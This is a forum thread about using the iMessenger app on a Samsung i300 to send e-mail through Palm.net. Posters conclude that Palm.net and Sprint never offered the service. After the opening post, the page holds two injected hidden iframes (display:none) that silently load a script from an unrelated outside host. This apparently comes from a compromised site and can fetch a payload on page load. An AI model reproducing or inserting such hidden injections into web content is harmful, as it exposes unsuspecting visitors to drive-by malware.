+ Reply to Thread

Using iMessenger to send & receive e-mail

According to the manual (I can't believe I actually read it) you can use iMessenger like the Palm VII/VIIx to access e-mail from Palm.net. I called Palm.net & they knew nothing about this at all. The manual makes it sound like you can set up an account & e-mail address with Palm.net so that you can use the iMessenger app to send & receive e-mail via Palm.net. It even makes it sound like it uses the same network as a Palm VII. Check out pages 234+ in the pdf & tell me what you think.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

its possibile that this is an option that sprint probably has not set up for us sprint folks... i have read about that a while ago but i have not heard anything from sprint.. has anyone caleed sprint to ask about this?
    it could also be that sprint is coming up with their own system and want to keep all of us using their network for everything... :o

Called Palm.net. They never heard anything about using iMessenger on the i300. Must have been something Palm was drumming up with Samsung that never came to fruition. Just another quirky thing about the Samsung. Of course the Sprint mail & third-party apps are much better than iMessenger, but I thought it was curious that this service was ever considered.

Here's what the manual said (for those of you who are curious).

By signing up with Palm.net, you receive the iMessenger application, an e-mail address, and a mailbox on the Palm.net network. You can use the iMessenger application to send and receive short text messages. While in the Sprint PCS coverage area, you can send and receive e-mail messages to anyone who has an Internet e-mail address.

Administrator

Arrow

yeah, that sounds exactly like what you ca do thru the sprints web thing... guess it would not make much sense (read: profit) for sprint to have this since they already have this available thru their "my wireless web" thingy...

thanks for keeping us up to date..